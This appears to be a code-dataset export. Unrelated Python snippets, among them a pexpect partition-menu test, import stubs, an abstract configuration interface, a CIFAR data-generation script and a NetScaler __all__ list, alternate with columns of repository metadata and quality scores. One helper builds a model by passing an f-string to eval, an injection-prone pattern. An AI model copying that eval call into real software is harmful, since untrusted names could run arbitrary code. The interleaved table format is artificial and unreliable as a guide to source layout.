update_dict = new_mountpoint[new_mountpoint.keys()[0]].copy()
update_dict.update({'mountpoint':'/mnt/cache3'})
child.expect("Make a choice")
for opt in ["device", "label", "percentage", "mountpoint"]:
child.expect("Make a choice")
pick_option(child, opt)
child.sendline(update_dict[opt])
pick_option(child, "finish")
disk_layout[0][update_dict['mountpoint']] = new_mountpoint[new_mountpoint.keys()[0]].copy()
formated_lines = get_formated_lines(disk_layout[0])
check_partition_layout_table(formated_lines.values())
#3 Print
child.expect("Enter number or name; return for next page")
child.sendline("3")
check_partition_layout_table(formated_lines.values())
#1 Remove
child.expect("Enter number or name; return for next page")
child.sendline("1")
child.expect("Enter mountpoint to remove")
child.sendline(update_dict['mountpoint'])
del disk_layout[0][update_dict['mountpoint']]
formated_lines = get_formated_lines(disk_layout[0])
check_partition_layout_table(formated_lines.values())
#5 Quit
child.expect("Enter number or name; return for next page")
child.sendline("5")
child.expect(":")
child.kill(9)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(PartitionLayout)
unittest.TextTestRunner().run(suite)
| 93.848988
| 145
| 0.473935
| 16,259
| 129,887
| 3.644997
| 0.021158
| 0.245798
| 0.405373
| 0.426482
| 0.923799
| 0.919445
| 0.912594
| 0.908309
| 0.905018
| 0.905018
| 0
| 0.074233
| 0.234173
| 129,887
| 1,383
| 146
| 93.916847
| 0.521559
| 0.005474
| 0
| 0.723869
| 0
| 0.00078
| 0.396445
| 0.001693
| 0.00078
| 0
| 0
| 0
| 0.0039
| 0
| null | null | 0.00156
| 0.00702
| null | null | 0.0078
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
2eaa8d4b7278fb0a1496c57827f467269ae8bf7a
| 162
|
py
|
Python
|
slap_dj/_attr/__init__.py
|
KooCook/slap
|
dfd5ae095980920c12ba1451926aa5b819997a47
|
[
"BSD-3-Clause"
] | null | null | null |
slap_dj/_attr/__init__.py
|
KooCook/slap
|
dfd5ae095980920c12ba1451926aa5b819997a47
|
[
"BSD-3-Clause"
] | null | null | null |
slap_dj/_attr/__init__.py
|
KooCook/slap
|
dfd5ae095980920c12ba1451926aa5b819997a47
|
[
"BSD-3-Clause"
] | 1
|
2021-06-22T05:04:12.000Z
|
2021-06-22T05:04:12.000Z
|
# version 20.0.0 cannot star import
# from attr import *
from _attr import validators as v
from _attr import converters as c
from _attr import write_attrs_models
| 27
| 36
| 0.802469
| 28
| 162
| 4.464286
| 0.571429
| 0.256
| 0.448
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02963
| 0.166667
| 162
| 5
| 37
| 32.4
| 0.896296
| 0.320988
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2eac10b423491145db58fb0e686dbd985f445c16
| 107
|
py
|
Python
|
torchcv/models/fpnssd/__init__.py
|
CVHj/torchcv
|
6291f3e1e4bbf6467fd6b1e79001d34a59481bb6
|
[
"MIT"
] | 433
|
2017-11-30T15:46:58.000Z
|
2022-01-16T08:06:11.000Z
|
torchcv/models/fpnssd/__init__.py
|
CVHj/torchcv
|
6291f3e1e4bbf6467fd6b1e79001d34a59481bb6
|
[
"MIT"
] | 51
|
2018-01-29T15:14:33.000Z
|
2021-08-23T12:02:18.000Z
|
fpn-hoi/torchcv/models/fpnssd/__init__.py
|
TheFairBear/Box-Attention-SSD-HOI
|
6101e209a709899c5645342784c8f451028ff46e
|
[
"MIT"
] | 92
|
2018-01-20T07:45:36.000Z
|
2021-05-28T10:43:53.000Z
|
from torchcv.models.fpnssd.net import FPNSSD512
from torchcv.models.fpnssd.box_coder import FPNSSDBoxCoder
| 35.666667
| 58
| 0.869159
| 15
| 107
| 6.133333
| 0.666667
| 0.23913
| 0.369565
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.074766
| 107
| 2
| 59
| 53.5
| 0.89899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2efa25c278f4857de533b1e6298ee75f4889da43
| 149
|
py
|
Python
|
seg/model/__init__.py
|
Shuo625/mr-image-segment
|
bcea675525dc436fa5a0dc8f3ce370ac1b614c2d
|
[
"MIT"
] | null | null | null |
seg/model/__init__.py
|
Shuo625/mr-image-segment
|
bcea675525dc436fa5a0dc8f3ce370ac1b614c2d
|
[
"MIT"
] | null | null | null |
seg/model/__init__.py
|
Shuo625/mr-image-segment
|
bcea675525dc436fa5a0dc8f3ce370ac1b614c2d
|
[
"MIT"
] | null | null | null |
from .unet import UNet
from .transunet import TransUNet
def build_model_helper(model_name, model_cfg):
return eval(f'{model_name}(model_cfg)')
| 21.285714
| 46
| 0.778523
| 23
| 149
| 4.782609
| 0.565217
| 0.163636
| 0.254545
| 0.309091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127517
| 149
| 6
| 47
| 24.833333
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0.154362
| 0.154362
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
2c031557f8ea1cd8b2c941b8fd611c637943df04
| 3,177
|
py
|
Python
|
app/configuration/iconfiguration_handler.py
|
abotkit/charlotte
|
eda388f01d196d2579d9350c19d125ff343b77cb
|
[
"MIT"
] | null | null | null |
app/configuration/iconfiguration_handler.py
|
abotkit/charlotte
|
eda388f01d196d2579d9350c19d125ff343b77cb
|
[
"MIT"
] | null | null | null |
app/configuration/iconfiguration_handler.py
|
abotkit/charlotte
|
eda388f01d196d2579d9350c19d125ff343b77cb
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class IConfigHandler(ABC):
@abstractmethod
def get_server_identifier(self):
raise NotImplementedError
@abstractmethod
def force_redis_setting_data(self):
raise NotImplementedError
@abstractmethod
def get_minio_model_folder(self):
raise NotImplementedError
@abstractmethod
def get_minio_data_folder(self):
raise NotImplementedError
@abstractmethod
def get_rasa_server_port(self):
raise NotImplementedError
@abstractmethod
def get_rasa_action_server_port(self):
raise NotImplementedError
@abstractmethod
def get_rasa_server_url(self):
raise NotImplementedError
@abstractmethod
def get_rasa_action_server_url(self):
raise NotImplementedError
@abstractmethod
def get_rasa_webhook(self):
raise NotImplementedError
@abstractmethod
def get_abotkit_charlotte_port(self):
raise NotImplementedError
@abstractmethod
def get_rasa_server_debug_level(self):
raise NotImplementedError
@abstractmethod
def get_rasa_action_server_debug_level(self):
raise NotImplementedError
@abstractmethod
def start_rasa_action_server(self):
raise NotImplementedError
@abstractmethod
def get_minio_config(self):
raise NotImplementedError
@abstractmethod
def get_rasa_domain_file_key(self):
raise NotImplementedError
@abstractmethod
def get_rasa_nlu_file_key(self):
raise NotImplementedError
@abstractmethod
def get_rasa_model_key(self):
raise NotImplementedError
@abstractmethod
def get_rasa_model_minio_key(self):
raise NotImplementedError
@abstractmethod
def get_rasa_rules_key(self):
raise NotImplementedError
@abstractmethod
def get_rasa_stories_key(self):
raise NotImplementedError
@abstractmethod
def get_rasa_endpoints_file(self):
raise NotImplementedError
@abstractmethod
def get_rasa_config_file(self):
raise NotImplementedError
@abstractmethod
def get_redis_configuration(self):
raise NotImplementedError
@abstractmethod
def get_redis_model_channel(self):
raise NotImplementedError
@abstractmethod
def get_storage_path(self):
raise NotImplementedError
@abstractmethod
def get_rasa_action_folder(self):
raise NotImplementedError
@abstractmethod
def use_redis(self):
raise NotImplementedError
@abstractmethod
def use_minio(self):
raise NotImplementedError
@abstractmethod
def get_minio_files(self):
raise NotImplementedError
@abstractmethod
def get_bot_name(self):
raise NotImplementedError
@abstractmethod
def get_config_path(self):
raise NotImplementedError
@abstractmethod
def get_github_connection_url(self):
raise NotImplementedError
@abstractmethod
def get_github_repo_storage_path(self):
raise NotImplementedError
@abstractmethod
def use_github(self):
raise NotImplementedError
| 22.531915
| 49
| 0.717658
| 309
| 3,177
| 7.064725
| 0.158576
| 0.264773
| 0.436097
| 0.634906
| 0.857994
| 0.83738
| 0.701328
| 0.415483
| 0.259734
| 0
| 0
| 0
| 0.238275
| 3,177
| 140
| 50
| 22.692857
| 0.902066
| 0
| 0
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326923
| false
| 0
| 0.009615
| 0
| 0.346154
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
25cd6f9444d6454b38eac70b1995ae9ab895ed70
| 1,757
|
py
|
Python
|
get_data.py
|
Nilay017/Generative-Deep-Neural-Network-Mixture-Modeling-with-Semi-Supervised-MinMax-EM-Learning
|
705718823f50507f82ee1a657bba33b1c3d6d02b
|
[
"MIT"
] | 1
|
2021-09-05T22:54:59.000Z
|
2021-09-05T22:54:59.000Z
|
get_data.py
|
Nilay017/Generative-Deep-Neural-Network-Mixture-Modeling-with-Semi-Supervised-MinMax-EM-Learning
|
705718823f50507f82ee1a657bba33b1c3d6d02b
|
[
"MIT"
] | null | null | null |
get_data.py
|
Nilay017/Generative-Deep-Neural-Network-Mixture-Modeling-with-Semi-Supervised-MinMax-EM-Learning
|
705718823f50507f82ee1a657bba33b1c3d6d02b
|
[
"MIT"
] | null | null | null |
from data_processing import *
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4]),\
32, 1000, 2.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4]),\
32, 1000, 3.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4]),\
32, 1000, 4.0, '/home/nilay/GANMM-master/data')
print("Generating 5 clusters CIFAR10 done!")
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6]),\
32, 1000, 0.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6]),\
32, 1000, 1.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6]),\
32, 1000, 2.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6]),\
32, 1000, 3.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6]),\
32, 1000, 4.0, '/home/nilay/GANMM-master/data')
print("Generating 7 clusters CIFAR10 done!")
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]),\
32, 1000, 0.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]),\
32, 1000, 1.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]),\
32, 1000, 2.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]),\
32, 1000, 3.0, '/home/nilay/GANMM-master/data')
create_and_store_CIFARdataset('./', np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]),\
32, 1000, 4.0, '/home/nilay/GANMM-master/data')
print("Generating 10 clusters CIFAR10 done!")
| 36.604167
| 78
| 0.634604
| 317
| 1,757
| 3.391167
| 0.100946
| 0.108837
| 0.169302
| 0.314419
| 0.956279
| 0.956279
| 0.956279
| 0.956279
| 0.956279
| 0.956279
| 0
| 0.138691
| 0.121799
| 1,757
| 48
| 79
| 36.604167
| 0.558004
| 0
| 0
| 0.866667
| 0
| 0
| 0.289534
| 0.214448
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.033333
| 0
| 0.033333
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
25df21c52026bb9923082e77ace9ee539336da1f
| 382
|
py
|
Python
|
nssrc/com/citrix/netscaler/nitro/resource/config/filter/__init__.py
|
benfinke/ns_python
|
d651d7aa01d7dc63c1cd435c7b3314d7f5b26659
|
[
"Apache-2.0"
] | 2
|
2020-08-24T18:04:22.000Z
|
2020-08-24T18:04:47.000Z
|
nssrc/com/citrix/netscaler/nitro/resource/config/filter/__init__.py
|
benfinke/ns_python
|
d651d7aa01d7dc63c1cd435c7b3314d7f5b26659
|
[
"Apache-2.0"
] | 1
|
2017-01-20T22:56:58.000Z
|
2017-01-20T22:56:58.000Z
|
nssrc/com/citrix/netscaler/nitro/resource/config/filter/__init__.py
|
benfinke/ns_python
|
d651d7aa01d7dc63c1cd435c7b3314d7f5b26659
|
[
"Apache-2.0"
] | 6
|
2015-04-21T13:14:08.000Z
|
2020-12-03T07:27:52.000Z
|
__all__ = ['filteraction', 'filterglobal_binding', 'filterglobal_filterpolicy_binding', 'filterhtmlinjectionparameter', 'filterhtmlinjectionvariable', 'filterpolicy', 'filterpolicy_binding', 'filterpolicy_crvserver_binding', 'filterpolicy_csvserver_binding', 'filterpolicy_filterglobal_binding', 'filterpolicy_lbvserver_binding', 'filterpostbodyinjection', 'filterprebodyinjection']
| 382
| 382
| 0.856021
| 26
| 382
| 11.961538
| 0.461538
| 0.244373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036649
| 382
| 1
| 382
| 382
| 0.845109
| 0
| 0
| 0
| 0
| 0
| 0.835509
| 0.668407
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.